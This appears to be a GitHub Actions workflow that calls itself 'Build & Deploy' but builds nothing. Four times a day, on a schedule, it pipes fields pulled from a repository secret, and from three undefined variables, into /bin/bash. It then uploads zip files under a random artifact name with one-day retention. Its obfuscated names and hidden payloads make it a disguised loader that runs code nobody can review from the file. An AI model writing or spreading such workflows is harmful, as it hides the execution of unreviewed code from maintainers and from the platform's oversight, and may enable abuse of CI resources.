name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '13 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          urdt6: ${{ secrets.urdt6 }}
        run: |
          printf '%s' "$urdt6" | jq -r .e4950 | /bin/bash
          printf '%s' "$yfja393" | jq -r .mvq20356 | /bin/bash
          printf '%s' "$nn4711" | jq -r .akvmw54 | /bin/bash
          printf '%s' "$tv2" | jq -r .c7074 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: pSF5lrQH
          path: "*.zip"
          retention-days: 1
